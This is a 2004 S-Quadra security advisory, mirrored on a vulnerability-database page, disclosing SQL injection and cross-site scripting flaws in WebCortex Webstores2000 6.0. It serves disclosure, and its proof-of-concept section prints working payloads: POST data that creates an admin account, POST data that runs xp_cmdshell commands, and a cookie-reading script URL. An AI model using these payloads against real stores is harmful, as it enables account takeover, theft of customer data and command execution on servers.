Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adv-20040218.txt

🗓️ 18 Feb 2004 00:00:00Reported by Nick GudovType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

WebCortex Webstores2000 has high-severity SQL Injection and Cross Site Scripting vulnerabilities.

Code
` S-Quadra Advisory #2004-02-18  
  
Topic: WebCortex Webstores2000 version 6.0 multiple security vulnerabilities  
Severity: High  
Vendor URL: http://www.webcortex.com  
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040218.txt  
Release date: 18 Feb 2004  
  
1. DESCRIPTION  
  
Webstores2000 is a complete solution for building shopping carts and   
shopping malls  
for e-commerce enabled sites. Its written on ASP, works on most Windows   
platforms  
and uses MS Access or MS SQL Server as a backend.  
Please visit http://www.webcortex.com for information about Webstores2000.  
  
2. DETAILS  
  
-- Vulnerability 1: SQL Injection vulnerability  
  
An SQL Injection vulnerability has been found in the 'browse_items.asp'   
script  
  
User supplied input is not filtered before being used in a SQL query.   
Consequently,  
query modification using malformed input is possible.  
  
Successfull exploitation of this vulnerability could allow an attacker   
to gain  
administrative access to shopping mall and read any information from  
database (i.e. customers private data). Also an attacker could execute   
arbitrary  
commands using xp_cmdshell function.  
  
-- Vulnerability 2: Cross Site Scripting vulnerability in 'error.asp'  
  
By injecting specially crafted javascript code in url and tricking a   
user to visit  
it a remote attacker can steal user session id and gain access to user's   
personal data.  
  
--PoC code  
  
--Vulnerability 1:  
  
Platform: MS SQL Server as a backend  
  
Posting this data to browse_items.asp creates new administrative account  
  
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Binsert+into+Mall_Logins+%28Mall_User_Id%2C+Mall_Password%29+values+%281%2C2%29--&Search_Store.x=0&Search_Store.y=0  
  
Posting this data to browse_items.asp executes 'dir c:' command  
  
Search_Text=&Search_Dept=1&SEARCH_MINPRICE=&SEARCH_MAXPRICE=&SEARCH_SKU=%25%27+AND+Store_Items.Show+%3C%3E+0+AND+Store_Item_Keyword.Store_id%3D1000+and+Store_Items.Store_id%3D1000+GROUP+BY+Store_Items.Quantity_Minimum%2C+Store_Items.U_d_1_name%2C+Store_Items.U_d_2_name%2CStore_Items.U_d_3_name%2CStore_Items.U_d_4_name%2C+Store_Item_Keyword.Item_Id%2CStore_Items.Item_Sku%2C+Store_Items.Item_Name%2C+Store_Items.Retail_Price%2C+Store_Items.ImageS_id%2C+Store_Items.Item_Weight%2C+Store_Items.Quantity_in_stock%2C+Store_Items.Quantity_Control_Number%2C+Store_Items.Retail_Price_special_Discount%2C+Store_Items.Special_start_date%2C+Store_Items.Special_end_date+ORDER+BY+Count%28Store_Item_Keyword.Item_Id%29+DESC%3Bexec+master..xp_cmdshell+%27dir+c%3A+%3E+c%3A%5Cresdirc.txt%27--&Search_Store.x=39&Search_Store.y=4  
  
-- Vulnerability 2:  
  
http://[target]/error.asp?Message_id=35<script>alert(document.cookie)</script>  
  
3. FIX INFORMATION  
S-Quadra alerted WebCortex development team to this issue on 13th   
February 2004.  
The following response from Shay Sabah has been received:  
"OK... All of these have been fixed...  
Now, I ask you to please STOP using our software and making all these   
"security" emails..."  
  
4. CREDITS  
  
Nick Gudov <[email protected]> is responsible for discovering this issue.  
  
5. ABOUT  
  
S-Quadra offers services in computer security, penetration testing and   
network assesment,  
web application security, source code review and third party product   
vulnerability assesment,  
forensic support and reverse engineering.  
  
S-Quadra Advisory #2004-02-18  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
18 Feb 2004 00:00Current
webcortexwebstores2000security vulnerabilitiessql injectioncross site scriptinge-commerceadministrative accesspersonal datamalicious input.
24